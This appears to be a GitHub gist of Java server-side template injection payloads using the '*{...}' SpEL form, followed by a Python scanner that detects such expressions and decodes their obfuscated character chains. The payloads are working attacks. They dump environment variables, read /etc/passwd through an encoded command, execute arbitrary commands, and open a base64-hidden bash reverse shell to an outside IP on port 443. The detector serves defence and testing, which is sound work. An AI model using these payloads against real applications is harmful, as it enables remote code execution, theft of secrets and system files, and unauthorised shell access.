@kavishkagihan
Last active January 14, 2024 18:18
Java SSTI payloads to read remote files and get RCE

  • Java SSTI payloads typically start with `$` (`${...}`). If that character is banned, `*` can be used instead (`*{...}`); every payload below uses the `*` form.

  • Get env vars

```
*{T(java.lang.System).getenv()}
```

  • Read files (/etc/passwd); the command string is assembled from character codes via `Character.toString`, so it contains no quotes

```
*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
```

  • Execute commands

```
*{T(java.lang.Runtime).getRuntime().exec('cat /etc/passwd')}
```

  • Get a shell (base64 encoded reverse shell)

```
*{new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xMDEvNDQzIDA+JjE=}|{base64,-d}|{bash,-i}").getInputStream()).next()}
```
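A filter that only looks for `${` misses the `*{` form this gist relies on. The following Python example is added here as a detection aid and is not part of the gist: it scans a request parameter or template fragment for a SpEL expression under any opening delimiter, flags type references to the classes these payloads reach for (the watch-list and the sample inputs are assumptions constructed for the demo), and decodes a `Character.toString(...).concat(...)` chain like the one above so the hidden command is visible in a log or alert.

```python
import re

# Opening delimiter and body of a template expression. A filter keyed only on
# '$' misses the '*{...}' form used in this gist, so all four are matched.
EXPR_RE = re.compile(r'([$*#@])\{(.*)\}', re.DOTALL)
# SpEL type reference: T(fully.qualified.Name)
TYPE_REF_RE = re.compile(r'\bT\(\s*([\w.]+)\s*\)')
# One obfuscated character: T(java.lang.Character).toString(<code point>)
CHAR_RE = re.compile(r'T\(java\.lang\.Character\)\.toString\((\d+)\)')
# Classes used by the payloads above (assumed watch-list; extend as needed).
SENSITIVE_CLASSES = {
    'java.lang.Runtime', 'java.lang.ProcessBuilder', 'java.lang.System',
    'java.util.Scanner', 'org.apache.commons.io.IOUtils',
}


def decode_char_chain(expr: str) -> str:
    """Rebuild the string hidden in a Character.toString(n).concat(...) chain."""
    return ''.join(chr(int(cp)) for cp in CHAR_RE.findall(expr))


def scan(value: str) -> dict:
    """Inspect one request parameter or template fragment for SpEL abuse.

    'suspicious' is True when the expression uses a type reference to one of
    SENSITIVE_CLASSES, whichever delimiter character opens it.
    """
    match = EXPR_RE.search(value)
    if not match:
        return {'suspicious': False, 'prefix': None}
    prefix, body = match.group(1), match.group(2)
    types = set(TYPE_REF_RE.findall(body))
    hits = sorted(types & SENSITIVE_CLASSES)
    return {
        'suspicious': bool(hits),
        'prefix': prefix,
        'type_refs': sorted(types),
        'sensitive': hits,
        'decoded_chars': decode_char_chain(body),  # '' if no obfuscation chain
    }


if __name__ == '__main__':
    # Constructed samples: a benign selection expression and the first payload
    # from this gist in both its '$' and '*' forms.
    for sample in ('*{user.name}',
                   '${T(java.lang.System).getenv()}',
                   '*{T(java.lang.System).getenv()}'):
        print(sample, '->', scan(sample))
```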